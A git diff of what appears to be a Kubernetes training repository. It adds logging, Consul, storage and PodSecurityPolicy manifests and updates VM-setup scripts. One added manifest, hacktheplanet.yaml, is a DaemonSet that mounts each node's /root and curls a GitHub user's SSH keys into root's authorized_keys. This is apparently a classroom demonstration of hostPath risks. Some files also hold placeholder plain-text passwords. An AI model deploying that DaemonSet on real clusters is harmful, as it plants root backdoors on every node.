Stage up program for New Relic

Clarify daemon sets (fixes #471)
Update README.md
2026-03-01 00:40:19 +00:00 · 2019-07-25 17:23:36 -05:00 · 2019-07-25 11:47:43 -05:00 · 2019-07-25 06:22:29 -05:00 · 2019-07-17 05:41:07 -05:00 · 2019-07-16 13:32:12 -07:00
155 changed files with 35291 additions and 1721 deletions
--- a/README.md
+++ b/README.md
@@ -39,7 +39,7 @@ your own tutorials.
 All these materials have been gathered in a single repository
 because they have a few things in common:

- some [common slides](slides/common/) that are re-used
+- some [shared slides](slides/shared/) that are re-used
  (and updated) identically between different decks;
 - a [build system](slides/) generating HTML slides from
  Markdown source files;
--- a/k8s/efk.yaml
+++ b/k8s/efk.yaml
@@ -3,7 +3,6 @@ apiVersion: v1
 kind: ServiceAccount
 metadata:
  name: fluentd
-
 ---
 apiVersion: rbac.authorization.k8s.io/v1beta1
 kind: ClusterRole
@@ -19,7 +18,6 @@ rules:
  - get
  - list
  - watch
-
 ---
 kind: ClusterRoleBinding
 apiVersion: rbac.authorization.k8s.io/v1beta1
@@ -33,23 +31,18 @@ subjects:
 - kind: ServiceAccount
  name: fluentd
  namespace: default
-
 ---
 apiVersion: extensions/v1beta1
 kind: DaemonSet
 metadata:
  name: fluentd
  labels:
-    k8s-app: fluentd-logging
-    version: v1
-    kubernetes.io/cluster-service: "true"
+    app: fluentd
 spec:
  template:
    metadata:
      labels:
-        k8s-app: fluentd-logging
-        version: v1
-        kubernetes.io/cluster-service: "true"
+        app: fluentd
    spec:
      serviceAccount: fluentd
      serviceAccountName: fluentd
@@ -58,7 +51,7 @@ spec:
        effect: NoSchedule
      containers:
      - name: fluentd
-        image: fluent/fluentd-kubernetes-daemonset:elasticsearch
+        image: fluent/fluentd-kubernetes-daemonset:v1.3-debian-elasticsearch-1
        env:
          - name:  FLUENT_ELASTICSEARCH_HOST
            value: "elasticsearch"
@@ -66,14 +59,12 @@ spec:
            value: "9200"
          - name: FLUENT_ELASTICSEARCH_SCHEME
            value: "http"
-          # X-Pack Authentication
-          # =====================
-          - name: FLUENT_ELASTICSEARCH_USER
-            value: "elastic"
-          - name: FLUENT_ELASTICSEARCH_PASSWORD
-            value: "changeme"
          - name: FLUENT_UID
            value: "0"
+          - name: FLUENTD_SYSTEMD_CONF
+            value: "disable"
+          - name: FLUENTD_PROMETHEUS_CONF
+            value: "disable"
        resources:
          limits:
            memory: 200Mi
@@ -94,134 +85,83 @@ spec:
      - name: varlibdockercontainers
        hostPath:
          path: /var/lib/docker/containers
-
 ---
 apiVersion: extensions/v1beta1
 kind: Deployment
 metadata:
-  annotations:
-    deployment.kubernetes.io/revision: "1"
-  creationTimestamp: null
-  generation: 1
  labels:
-    run: elasticsearch
+    app: elasticsearch
  name: elasticsearch
-  selfLink: /apis/extensions/v1beta1/namespaces/default/deployments/elasticsearch
 spec:
-  progressDeadlineSeconds: 600
-  replicas: 1
-  revisionHistoryLimit: 10
  selector:
    matchLabels:
-      run: elasticsearch
-  strategy:
-    rollingUpdate:
-      maxSurge: 1
-      maxUnavailable: 1
-    type: RollingUpdate
+      app: elasticsearch
  template:
    metadata:
-      creationTimestamp: null
      labels:
-        run: elasticsearch
+        app: elasticsearch
    spec:
      containers:
-      - image: elasticsearch:5.6.8
-        imagePullPolicy: IfNotPresent
+      - image: elasticsearch:5
        name: elasticsearch
-        resources: {}
-        terminationMessagePath: /dev/termination-log
-        terminationMessagePolicy: File
+        resources:
+          limits:
+            memory: 2Gi
+          requests:
+            memory: 1Gi
        env:
        - name: ES_JAVA_OPTS
          value: "-Xms1g -Xmx1g"
-      dnsPolicy: ClusterFirst
-      restartPolicy: Always
-      schedulerName: default-scheduler
-      securityContext: {}
-      terminationGracePeriodSeconds: 30
-
 ---
 apiVersion: v1
 kind: Service
 metadata:
-  creationTimestamp: null
  labels:
-    run: elasticsearch
+    app: elasticsearch
  name: elasticsearch
-  selfLink: /api/v1/namespaces/default/services/elasticsearch
 spec:
  ports:
  - port: 9200
    protocol: TCP
    targetPort: 9200
  selector:
-    run: elasticsearch
-  sessionAffinity: None
+    app: elasticsearch
  type: ClusterIP
-
 ---
 apiVersion: extensions/v1beta1
 kind: Deployment
 metadata:
-  annotations:
-    deployment.kubernetes.io/revision: "1"
-  creationTimestamp: null
-  generation: 1
  labels:
-    run: kibana
+    app: kibana
  name: kibana
-  selfLink: /apis/extensions/v1beta1/namespaces/default/deployments/kibana
 spec:
-  progressDeadlineSeconds: 600
-  replicas: 1
-  revisionHistoryLimit: 10
  selector:
    matchLabels:
-      run: kibana
-  strategy:
-    rollingUpdate:
-      maxSurge: 1
-      maxUnavailable: 1
-    type: RollingUpdate
+      app: kibana
  template:
    metadata:
-      creationTimestamp: null
      labels:
-        run: kibana
+        app: kibana
    spec:
      containers:
      - env:
        - name: ELASTICSEARCH_URL
          value: http://elasticsearch:9200/
-        image: kibana:5.6.8
-        imagePullPolicy: Always
+        image: kibana:5
        name: kibana
        resources: {}
-        terminationMessagePath: /dev/termination-log
-        terminationMessagePolicy: File
-      dnsPolicy: ClusterFirst
-      restartPolicy: Always
-      schedulerName: default-scheduler
-      securityContext: {}
-      terminationGracePeriodSeconds: 30
-
 ---
 apiVersion: v1
 kind: Service
 metadata:
-  creationTimestamp: null
  labels:
-    run: kibana
+    app: kibana
  name: kibana
-  selfLink: /api/v1/namespaces/default/services/kibana
 spec:
-  externalTrafficPolicy: Cluster
  ports:
  - port: 5601
    protocol: TCP
    targetPort: 5601
  selector:
-    run: kibana
-  sessionAffinity: None
+    app: kibana
  type: NodePort
--- a/k8s/elasticsearch-cluster.yaml
+++ b/k8s/elasticsearch-cluster.yaml
@@ -0,0 +1,21 @@
+apiVersion: enterprises.upmc.com/v1
+kind: ElasticsearchCluster
+metadata:
+  name: es
+spec:
+  elastic-search-image: upmcenterprises/docker-elasticsearch-kubernetes:6.1.3_0
+  image-pull-policy: Always
+  master-node-replicas: 3
+  data-node-replicas: 3
+  client-node-replicas: 2
+  data-volume-size: 10Gi
+  java-options: '-Xms512m -Xmx512m'  # JVM heap: initial and maximum both 512m
+  network-host: 0.0.0.0
+  use-ssl: false
+  cerebro:
+    image: upmcenterprises/cerebro:0.7.2
+    image-pull-policy: Always
+  kibana:
+    image: docker.elastic.co/kibana/kibana-oss:6.1.3
+    image-pull-policy: Always
+
--- a/k8s/elasticsearch-operator.yaml
+++ b/k8s/elasticsearch-operator.yaml
@@ -0,0 +1,94 @@
+# This is mirrored from https://github.com/upmc-enterprises/elasticsearch-operator/blob/master/example/controller.yaml but using the elasticsearch-operator namespace instead of operator
+---
+apiVersion: v1
+kind: Namespace
+metadata:
+  name: elasticsearch-operator  # namespace used by the ServiceAccount and Deployment in this file
+---
+apiVersion: v1
+kind: ServiceAccount
+metadata:
+  name: elasticsearch-operator  # subject of the ClusterRoleBinding below; used by the operator Deployment
+  namespace: elasticsearch-operator
+---
+apiVersion: rbac.authorization.k8s.io/v1beta1
+kind: ClusterRole
+metadata:
+  name: elasticsearch-operator  # bound to the operator ServiceAccount by the ClusterRoleBinding of the same name
+rules:
+- apiGroups: ["extensions"]
+  resources: ["deployments", "replicasets", "daemonsets"]
+  verbs: ["create", "get", "update", "delete", "list"]
+- apiGroups: ["apiextensions.k8s.io"]
+  resources: ["customresourcedefinitions"]
+  verbs: ["create", "get", "update", "delete", "list"]
+- apiGroups: ["storage.k8s.io"]
+  resources: ["storageclasses"]
+  verbs: ["get", "list", "create", "delete", "deletecollection"]
+- apiGroups: [""]  # "" is the core API group
+  resources: ["persistentvolumes", "persistentvolumeclaims", "services", "secrets", "configmaps"]
+  verbs: ["create", "get", "update", "delete", "list"]
+- apiGroups: ["batch"]
+  resources: ["cronjobs", "jobs"]
+  verbs: ["create", "get", "deletecollection", "delete"]
+- apiGroups: [""]  # "" is the core API group
+  resources: ["pods"]
+  verbs: ["list", "get", "watch"]  # read-only access to pods
+- apiGroups: ["apps"]
+  resources: ["statefulsets", "deployments"]
+  verbs: ["*"]
+- apiGroups: ["enterprises.upmc.com"]  # API group of the ElasticsearchCluster custom resource
+  resources: ["elasticsearchclusters"]
+  verbs: ["*"]
+---
+apiVersion: rbac.authorization.k8s.io/v1beta1
+kind: ClusterRoleBinding
+metadata:
+  name: elasticsearch-operator
+  namespace: elasticsearch-operator  # NOTE(review): ClusterRoleBinding is cluster-scoped; this field is presumably ignored — confirm
+roleRef:
+  apiGroup: rbac.authorization.k8s.io
+  kind: ClusterRole
+  name: elasticsearch-operator  # the ClusterRole defined earlier in this file
+subjects:
+- kind: ServiceAccount
+  name: elasticsearch-operator
+  namespace: elasticsearch-operator
+---
+apiVersion: extensions/v1beta1  # NOTE(review): legacy API group for Deployments; moving to apps/v1 would also need spec.selector
+kind: Deployment
+metadata:
+  name: elasticsearch-operator
+  namespace: elasticsearch-operator
+spec:
+  replicas: 1
+  template:
+    metadata:
+      labels:
+        name: elasticsearch-operator
+    spec:
+      containers:
+      - name: operator
+        image: upmcenterprises/elasticsearch-operator:0.2.0
+        imagePullPolicy: Always
+        env:
+        - name: NAMESPACE  # set to the pod's own namespace through the downward API
+          valueFrom:
+            fieldRef:
+              fieldPath: metadata.namespace
+        ports:
+        - containerPort: 8000
+          name: http
+        livenessProbe:
+          httpGet:
+            path: /live
+            port: 8000
+          initialDelaySeconds: 10
+          timeoutSeconds: 10
+        readinessProbe:
+          httpGet:
+            path: /ready
+            port: 8000
+          initialDelaySeconds: 10
+          timeoutSeconds: 5
+      serviceAccountName: elasticsearch-operator  # canonical field; "serviceAccount" is only a deprecated alias
--- a/k8s/filebeat.yaml
+++ b/k8s/filebeat.yaml
@@ -0,0 +1,167 @@
+---
+apiVersion: v1
+kind: ConfigMap
+metadata:
+  name: filebeat-config  # mounted by the filebeat DaemonSet at /etc/filebeat.yml (subPath filebeat.yml)
+  namespace: kube-system
+  labels:
+    k8s-app: filebeat
+data:  # the ${...} placeholders below are filled from the DaemonSet's env entries of the same names
+  filebeat.yml: |-
+    filebeat.config:
+      inputs:
+        # Mounted `filebeat-inputs` configmap:
+        path: ${path.config}/inputs.d/*.yml
+        # Reload inputs configs as they change:
+        reload.enabled: false
+      modules:
+        path: ${path.config}/modules.d/*.yml
+        # Reload module configs as they change:
+        reload.enabled: false
+
+    # To enable hints based autodiscover, remove `filebeat.config.inputs` configuration and uncomment this:
+    #filebeat.autodiscover:
+    #  providers:
+    #    - type: kubernetes
+    #      hints.enabled: true
+
+    processors:
+      - add_cloud_metadata:
+
+    cloud.id: ${ELASTIC_CLOUD_ID}
+    cloud.auth: ${ELASTIC_CLOUD_AUTH}
+
+    output.elasticsearch:
+      hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
+      username: ${ELASTICSEARCH_USERNAME}
+      password: ${ELASTICSEARCH_PASSWORD}
+---
+apiVersion: v1
+kind: ConfigMap
+metadata:
+  name: filebeat-inputs  # mounted by the filebeat DaemonSet at /usr/share/filebeat/inputs.d
+  namespace: kube-system
+  labels:
+    k8s-app: filebeat
+data:  # one input definition file; filebeat.yml loads inputs.d/*.yml
+  kubernetes.yml: |-
+    - type: docker
+      containers.ids:
+      - "*"
+      processors:
+        - add_kubernetes_metadata:
+            in_cluster: true
+---
+apiVersion: extensions/v1beta1  # NOTE(review): legacy API group for DaemonSets; apps/v1 would also need spec.selector
+kind: DaemonSet
+metadata:
+  name: filebeat
+  namespace: kube-system
+  labels:
+    k8s-app: filebeat
+spec:
+  template:
+    metadata:
+      labels:
+        k8s-app: filebeat
+    spec:
+      serviceAccountName: filebeat
+      terminationGracePeriodSeconds: 30
+      containers:
+      - name: filebeat
+        image: docker.elastic.co/beats/filebeat-oss:7.0.1
+        args: [
+          "-c", "/etc/filebeat.yml",
+          "-e",
+        ]
+        env:  # consumed as ${...} placeholders by filebeat.yml in the filebeat-config ConfigMap
+        - name: ELASTICSEARCH_HOST
+          value: elasticsearch-es.default.svc.cluster.local
+        - name: ELASTICSEARCH_PORT
+          value: "9200"
+        - name: ELASTICSEARCH_USERNAME
+          value: elastic
+        - name: ELASTICSEARCH_PASSWORD
+          value: changeme  # NOTE(review): plain-text placeholder credential; use a Secret for anything real
+        - name: ELASTIC_CLOUD_ID
+          value: ""  # explicitly empty rather than a bare (null) value
+        - name: ELASTIC_CLOUD_AUTH
+          value: ""  # explicitly empty rather than a bare (null) value
+        securityContext:
+          runAsUser: 0
+          # If using Red Hat OpenShift uncomment this:
+          #privileged: true
+        resources:
+          limits:
+            memory: 200Mi
+          requests:
+            cpu: 100m
+            memory: 100Mi
+        volumeMounts:
+        - name: config
+          mountPath: /etc/filebeat.yml
+          readOnly: true
+          subPath: filebeat.yml
+        - name: inputs
+          mountPath: /usr/share/filebeat/inputs.d
+          readOnly: true
+        - name: data
+          mountPath: /usr/share/filebeat/data
+        - name: varlibdockercontainers
+          mountPath: /var/lib/docker/containers
+          readOnly: true
+      volumes:
+      - name: config
+        configMap:
+          defaultMode: 0600  # octal literal (YAML 1.1), i.e. decimal 384
+          name: filebeat-config
+      - name: varlibdockercontainers
+        hostPath:
+          path: /var/lib/docker/containers
+      - name: inputs
+        configMap:
+          defaultMode: 0600  # octal literal (YAML 1.1), i.e. decimal 384
+          name: filebeat-inputs
+      # data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
+      - name: data
+        hostPath:
+          path: /var/lib/filebeat-data
+          type: DirectoryOrCreate
+---
+apiVersion: rbac.authorization.k8s.io/v1beta1
+kind: ClusterRoleBinding
+metadata:
+  name: filebeat
+roleRef:  # grants the filebeat ClusterRole ...
+  apiGroup: rbac.authorization.k8s.io
+  kind: ClusterRole
+  name: filebeat
+subjects:  # ... to the filebeat ServiceAccount in kube-system
+- namespace: kube-system
+  name: filebeat
+  kind: ServiceAccount
+---
+apiVersion: rbac.authorization.k8s.io/v1beta1
+kind: ClusterRole
+metadata:
+  labels:
+    k8s-app: filebeat
+  name: filebeat
+rules:  # read-only access to namespaces and pods
+- verbs:
+  - get
+  - watch
+  - list
+  resources:
+  - namespaces
+  - pods
+  apiGroups: [""]  # "" indicates the core API group
+---
+apiVersion: v1
+kind: ServiceAccount
+metadata:
+  name: filebeat  # referenced by the DaemonSet (serviceAccountName) and by the ClusterRoleBinding subject
+  namespace: kube-system
+  labels:
+    k8s-app: filebeat
+---
--- a/k8s/hacktheplanet.yaml
+++ b/k8s/hacktheplanet.yaml
@@ -0,0 +1,34 @@
+apiVersion: apps/v1
+kind: DaemonSet
+metadata:
+  name: hacktheplanet
+spec:
+  selector:
+    matchLabels:
+      app: hacktheplanet
+  template:
+    metadata:
+      labels:
+        app: hacktheplanet
+    spec:
+      tolerations:  # tolerate every NoSchedule taint
+      - operator: Exists
+        effect: NoSchedule
+      volumes:
+      - hostPath:
+          path: /root  # the node's own /root directory
+        name: root
+      initContainers:
+      - image: alpine
+        name: hacktheplanet
+        command:
+        - sh
+        - -c
+        - "apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
+        volumeMounts:  # the redirect above therefore overwrites authorized_keys under the node's /root
+        - mountPath: /root
+          name: root
+      containers:
+      - image: nginx
+        name: web
+
--- a/k8s/local-path-storage.yaml
+++ b/k8s/local-path-storage.yaml
@@ -0,0 +1,110 @@
+# This is a local copy of:
+# https://github.com/rancher/local-path-provisioner/blob/master/deploy/local-path-storage.yaml
+---
+apiVersion: v1
+kind: Namespace
+metadata:
+  name: local-path-storage  # namespace of the provisioner's ServiceAccount, Deployment and ConfigMap
+---
+apiVersion: v1
+kind: ServiceAccount
+metadata:
+  name: local-path-provisioner-service-account  # used by the local-path-provisioner Deployment
+  namespace: local-path-storage
+---
+apiVersion: rbac.authorization.k8s.io/v1beta1
+kind: ClusterRole
+metadata:
+  name: local-path-provisioner-role
+  namespace: local-path-storage
+rules:
+- apiGroups: [""]  # core API group: read-only on nodes and claims
+  resources: [nodes, persistentvolumeclaims]
+  verbs: [get, list, watch]
+- apiGroups: [""]  # core API group: full access to endpoints, PVs and pods
+  resources: [endpoints, persistentvolumes, pods]
+  verbs: ["*"]
+- apiGroups: [""]  # core API group: emit events
+  resources: [events]
+  verbs: [create, patch]
+- apiGroups: [storage.k8s.io]  # read-only on storage classes
+  resources: [storageclasses]
+  verbs: [get, list, watch]
+---
+apiVersion: rbac.authorization.k8s.io/v1beta1
+kind: ClusterRoleBinding
+metadata:
+  name: local-path-provisioner-bind
+  namespace: local-path-storage  # NOTE(review): ClusterRoleBinding is cluster-scoped; this field is presumably ignored — confirm
+roleRef:
+  apiGroup: rbac.authorization.k8s.io
+  kind: ClusterRole
+  name: local-path-provisioner-role
+subjects:
+- kind: ServiceAccount
+  name: local-path-provisioner-service-account  # the account the provisioner Deployment runs as
+  namespace: local-path-storage
+---
+apiVersion: apps/v1  # was apps/v1beta2 (deprecated); spec.selector is already present, as apps/v1 requires
+kind: Deployment
+metadata:
+  name: local-path-provisioner
+  namespace: local-path-storage
+spec:
+  replicas: 1
+  selector:
+    matchLabels:
+      app: local-path-provisioner
+  template:
+    metadata:
+      labels:
+        app: local-path-provisioner
+    spec:
+      serviceAccountName: local-path-provisioner-service-account
+      containers:
+      - name: local-path-provisioner
+        image: rancher/local-path-provisioner:v0.0.8
+        imagePullPolicy: Always
+        command:
+        - local-path-provisioner
+        - --debug
+        - start
+        - --config
+        - /etc/config/config.json  # file provided by the config-volume mount below
+        volumeMounts:
+        - name: config-volume
+          mountPath: /etc/config/
+        env:
+        - name: POD_NAMESPACE  # set to the pod's own namespace through the downward API
+          valueFrom:
+            fieldRef:
+              fieldPath: metadata.namespace
+      volumes:
+      - name: config-volume
+        configMap:
+          name: local-path-config
+---
+apiVersion: storage.k8s.io/v1
+kind: StorageClass
+metadata:
+  name: local-path
+provisioner: rancher.io/local-path  # NOTE(review): presumably the name served by the local-path-provisioner Deployment — confirm
+volumeBindingMode: WaitForFirstConsumer
+reclaimPolicy: Delete
+---
+kind: ConfigMap
+apiVersion: v1
+metadata:
+  name: local-path-config  # mounted at /etc/config/ by the local-path-provisioner Deployment
+  namespace: local-path-storage
+data:  # config.json is the file the provisioner is started with (--config /etc/config/config.json)
+  config.json: |-
+        {
+                "nodePathMap":[
+                {
+                        "node":"DEFAULT_PATH_FOR_NON_LISTED_NODES",
+                        "paths":["/opt/local-path-provisioner"]
+                }
+                ]
+        }
+
--- a/k8s/persistent-consul.yaml
+++ b/k8s/persistent-consul.yaml
@@ -0,0 +1,95 @@
+apiVersion: rbac.authorization.k8s.io/v1
+kind: Role
+metadata:
+  name: consul
+rules:  # read-only access to pods
+  - verbs: [get, list]
+    resources: [pods]
+    apiGroups: [""]
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: RoleBinding
+metadata:
+  name: consul
+roleRef:
+  apiGroup: rbac.authorization.k8s.io
+  kind: Role
+  name: consul  # the Role defined at the top of this file
+subjects:
+  - kind: ServiceAccount
+    name: consul
+    namespace: orange  # hard-coded; same namespace as in the StatefulSet's -retry-join argument
+---
+apiVersion: v1
+kind: ServiceAccount
+metadata:
+  name: consul  # used by the consul StatefulSet pods; subject of the consul RoleBinding
+---
+apiVersion: v1
+kind: Service
+metadata:
+  name: consul  # referenced as serviceName by the consul StatefulSet
+spec:
+  ports:
+  - port: 8500
+    name: http
+  selector:
+    app: consul  # matches the pod label set in the StatefulSet template
+---
+apiVersion: apps/v1
+kind: StatefulSet
+metadata:
+  name: consul
+spec:
+  replicas: 3  # same number as -bootstrap-expect in the container args
+  serviceName: consul
+  selector:
+    matchLabels:
+      app: consul
+  template:
+    metadata:
+      labels:
+        app: consul
+    spec:
+      serviceAccountName: consul
+      terminationGracePeriodSeconds: 10
+      affinity:
+        podAntiAffinity:  # at most one consul pod per hostname
+          requiredDuringSchedulingIgnoredDuringExecution:
+            - topologyKey: kubernetes.io/hostname
+              labelSelector:
+                matchExpressions:
+                  - key: app
+                    operator: In
+                    values:
+                      - consul
+      containers:
+        - name: consul
+          image: consul:1.4.4
+          args:
+            - agent
+            - "-bootstrap-expect=3"
+            - "-retry-join=provider=k8s namespace=orange label_selector=\"app=consul\""
+            - "-client=0.0.0.0"
+            - "-data-dir=/consul/data"
+            - "-server"
+            - "-ui"
+          volumeMounts:
+            - name: data  # the claim created from volumeClaimTemplates
+              mountPath: /consul/data
+          lifecycle:
+            preStop:  # run "consul leave" before the container is stopped
+              exec:
+                command:
+                  - /bin/sh
+                  - -c
+                  - consul leave
+  volumeClaimTemplates:
+    - metadata:
+        name: data
+      spec:
+        accessModes:
+          - ReadWriteOnce
+        resources:
+          requests:
+            storage: 1Gi
--- a/k8s/psp-privileged.yaml
+++ b/k8s/psp-privileged.yaml
@@ -0,0 +1,39 @@
+---
+apiVersion: policy/v1beta1
+kind: PodSecurityPolicy
+metadata:
+  annotations:
+    seccomp.security.alpha.kubernetes.io/allowedProfileNames: "*"
+  name: privileged
+spec:  # nothing is restricted: every switch is on and every rule is RunAsAny
+  privileged: true
+  allowPrivilegeEscalation: true
+  allowedCapabilities:
+  - "*"
+  hostIPC: true
+  hostPID: true
+  hostNetwork: true
+  hostPorts:
+  - max: 65535
+    min: 0
+  volumes:
+  - "*"
+  fsGroup:
+    rule: RunAsAny
+  runAsUser:
+    rule: RunAsAny
+  seLinux:
+    rule: RunAsAny
+  supplementalGroups:
+    rule: RunAsAny
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRole
+metadata:
+  name: psp:privileged
+rules:  # allows "use" of the PodSecurityPolicy named privileged
+- verbs: [use]
+  apiGroups: [policy]
+  resources: [podsecuritypolicies]
+  resourceNames: [privileged]
+
--- a/k8s/psp-restricted.yaml
+++ b/k8s/psp-restricted.yaml
@@ -0,0 +1,38 @@
+---
+apiVersion: policy/v1beta1  # same group as psp-privileged.yaml and as the psp:restricted ClusterRole (apiGroups: policy)
+kind: PodSecurityPolicy
+metadata:
+  annotations:
+    apparmor.security.beta.kubernetes.io/allowedProfileNames: runtime/default
+    apparmor.security.beta.kubernetes.io/defaultProfileName: runtime/default
+    seccomp.security.alpha.kubernetes.io/allowedProfileNames: docker/default
+    seccomp.security.alpha.kubernetes.io/defaultProfileName: docker/default
+  name: restricted
+spec:
+  allowPrivilegeEscalation: false
+  fsGroup:
+    rule: RunAsAny
+  runAsUser:
+    rule: RunAsAny
+  seLinux:
+    rule: RunAsAny
+  supplementalGroups:
+    rule: RunAsAny
+  volumes:  # allow-list of volume types; hostPath is not in it
+  - configMap
+  - emptyDir
+  - projected
+  - secret
+  - downwardAPI
+  - persistentVolumeClaim
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRole
+metadata:
+  name: psp:restricted
+rules:  # allows "use" of the PodSecurityPolicy named restricted
+- verbs: [use]
+  apiGroups: [policy]
+  resources: [podsecuritypolicies]
+  resourceNames: [restricted]
+
--- a/k8s/users:jean.doe.yaml
+++ b/k8s/users:jean.doe.yaml
@@ -0,0 +1,33 @@
+---
+apiVersion: v1
+kind: ServiceAccount
+metadata:
+  name: jean.doe  # subject of the users:jean.doe ClusterRoleBinding below
+  namespace: users
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRole
+metadata:
+  name: users:jean.doe
+rules:
+- apiGroups: [ certificates.k8s.io ]  # rule 1: create certificate signing requests (any name)
+  resources: [ certificatesigningrequests ]
+  verbs:     [ create ]
+- apiGroups:     [ certificates.k8s.io ]  # rule 2: limited to the single request named below
+  resourceNames: [ users:jean.doe ]
+  resources:     [ certificatesigningrequests ]
+  verbs:         [ get, create, delete, watch ]  # NOTE(review): "create" presumably cannot be narrowed by resourceNames — confirm
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRoleBinding
+metadata:
+  name: users:jean.doe
+roleRef:
+  apiGroup: rbac.authorization.k8s.io
+  kind: ClusterRole
+  name: users:jean.doe  # the ClusterRole defined just above
+subjects:
+- kind: ServiceAccount
+  name: jean.doe  # the ServiceAccount created at the top of this file
+  namespace: users
+
--- a/k8s/volumes-for-consul.yaml
+++ b/k8s/volumes-for-consul.yaml
@@ -0,0 +1,70 @@
+---
+apiVersion: v1
+kind: PersistentVolume
+metadata:
+  annotations:
+    node: node2
+  name: consul-node2
+spec:
+  accessModes:
+  - ReadWriteOnce
+  capacity:
+    storage: 10Gi
+  local:
+    path: /mnt/consul  # directory on the node that backs this volume
+  nodeAffinity:  # restricts the volume to the node whose hostname label is node2
+    required:
+      nodeSelectorTerms:
+      - matchExpressions:
+        - operator: In
+          key: kubernetes.io/hostname
+          values:
+          - node2
+  persistentVolumeReclaimPolicy: Delete
+---
+apiVersion: v1
+kind: PersistentVolume
+metadata:
+  annotations:
+    node: node3
+  name: consul-node3
+spec:
+  accessModes:
+  - ReadWriteOnce
+  capacity:
+    storage: 10Gi
+  local:
+    path: /mnt/consul  # directory on the node that backs this volume
+  nodeAffinity:  # restricts the volume to the node whose hostname label is node3
+    required:
+      nodeSelectorTerms:
+      - matchExpressions:
+        - operator: In
+          key: kubernetes.io/hostname
+          values:
+          - node3
+  persistentVolumeReclaimPolicy: Delete
+---
+apiVersion: v1
+kind: PersistentVolume
+metadata:
+  annotations:
+    node: node4
+  name: consul-node4
+spec:
+  accessModes:
+  - ReadWriteOnce
+  capacity:
+    storage: 10Gi
+  local:
+    path: /mnt/consul  # directory on the node that backs this volume
+  nodeAffinity:  # restricts the volume to the node whose hostname label is node4
+    required:
+      nodeSelectorTerms:
+      - matchExpressions:
+        - operator: In
+          key: kubernetes.io/hostname
+          values:
+          - node4
+  persistentVolumeReclaimPolicy: Delete
+
--- a/prepare-vms/lib/commands.sh
+++ b/prepare-vms/lib/commands.sh
@@ -2,7 +2,7 @@ export AWS_DEFAULT_OUTPUT=text

 HELP=""
 _cmd() {
-    HELP="$(printf "%s\n%-12s %s\n" "$HELP" "$1" "$2")"
+    HELP="$(printf "%s\n%-20s %s\n" "$HELP" "$1" "$2")"
 }

 _cmd help "Show available commands"
@@ -74,10 +74,10 @@ _cmd_deploy() {
    pssh -I sudo tee /usr/local/bin/docker-prompt <lib/docker-prompt
    pssh sudo chmod +x /usr/local/bin/docker-prompt

-    # If /home/docker/.ssh/id_rsa doesn't exist, copy it from node1
+    # If /home/docker/.ssh/id_rsa doesn't exist, copy it from the first node
    pssh "
    sudo -u docker [ -f /home/docker/.ssh/id_rsa ] ||
-    ssh -o StrictHostKeyChecking=no node1 sudo -u docker tar -C /home/docker -cvf- .ssh |
+    ssh -o StrictHostKeyChecking=no \$(cat /etc/name_of_first_node) sudo -u docker tar -C /home/docker -cvf- .ssh |
    sudo -u docker tar -C /home/docker -xf-"

    # if 'docker@' doesn't appear in /home/docker/.ssh/authorized_keys, copy it there
@@ -86,11 +86,11 @@ _cmd_deploy() {
    cat /home/docker/.ssh/id_rsa.pub |
    sudo -u docker tee -a /home/docker/.ssh/authorized_keys"

-    # On node1, create and deploy TLS certs using Docker Machine
+    # On the first node, create and deploy TLS certs using Docker Machine
    # (Currently disabled.)
    true || pssh "
-    if grep -q node1 /tmp/node; then
-        grep ' node' /etc/hosts | 
+    if i_am_first_node; then
+        grep '[0-9]\$' /etc/hosts |
        xargs -n2 sudo -H -u docker \
        docker-machine create -d generic --generic-ssh-user docker --generic-ip-address
    fi"
@@ -103,6 +103,16 @@ _cmd_deploy() {
    info "$0 cards $TAG"
 }

+_cmd disabledocker "Stop Docker Engine and don't restart it automatically"
+_cmd_disabledocker() {
+    TAG=$1
+    need_tag
+    # Disable both units, then stop both: a still-active docker.socket can start the engine again.
+    pssh "sudo systemctl disable docker.service"
+    pssh "sudo systemctl disable docker.socket"
+    pssh "sudo systemctl stop docker.socket docker.service"
+}
+
 _cmd kubebins "Install Kubernetes and CNI binaries but don't start anything"
 _cmd_kubebins() {
    TAG=$1
@@ -116,7 +126,7 @@ _cmd_kubebins() {
        | sudo tar --strip-components=1 --wildcards -zx '*/etcd' '*/etcdctl'
    fi
    if ! [ -x hyperkube ]; then
-        curl -L https://dl.k8s.io/v1.14.0/kubernetes-server-linux-amd64.tar.gz \
+        curl -L https://dl.k8s.io/v1.14.1/kubernetes-server-linux-amd64.tar.gz \
        | sudo tar --strip-components=3 -zx kubernetes/server/bin/hyperkube
    fi
    if ! [ -x kubelet ]; then
@@ -139,6 +149,16 @@ _cmd_kube() {
    TAG=$1
    need_tag

+    # Optional version, e.g. 1.13.5
+    KUBEVERSION=$2
+    if [ "$KUBEVERSION" ]; then
+        EXTRA_KUBELET="=$KUBEVERSION-00"
+        EXTRA_KUBEADM="--kubernetes-version=v$KUBEVERSION"
+    else
+        EXTRA_KUBELET=""
+        EXTRA_KUBEADM=""
+    fi
+
    # Install packages
    pssh --timeout 200 "
    curl -s https://packages.cloud.google.com/apt/doc/apt-key.gpg |
@@ -147,19 +167,19 @@ _cmd_kube() {
    sudo tee /etc/apt/sources.list.d/kubernetes.list"
    pssh --timeout 200 "
    sudo apt-get update -q &&
-    sudo apt-get install -qy kubelet kubeadm kubectl &&
+    sudo apt-get install -qy kubelet$EXTRA_KUBELET kubeadm kubectl &&
    kubectl completion bash | sudo tee /etc/bash_completion.d/kubectl"

    # Initialize kube master
    pssh --timeout 200 "
-    if grep -q node1 /tmp/node && [ ! -f /etc/kubernetes/admin.conf ]; then
+    if i_am_first_node && [ ! -f /etc/kubernetes/admin.conf ]; then
        kubeadm token generate > /tmp/token &&
-	sudo kubeadm init --token \$(cat /tmp/token) --apiserver-cert-extra-sans \$(cat /tmp/ipv4)
+	sudo kubeadm init $EXTRA_KUBEADM --token \$(cat /tmp/token) --apiserver-cert-extra-sans \$(cat /tmp/ipv4)
    fi"

    # Put kubeconfig in ubuntu's and docker's accounts
    pssh "
-    if grep -q node1 /tmp/node; then
+    if i_am_first_node; then
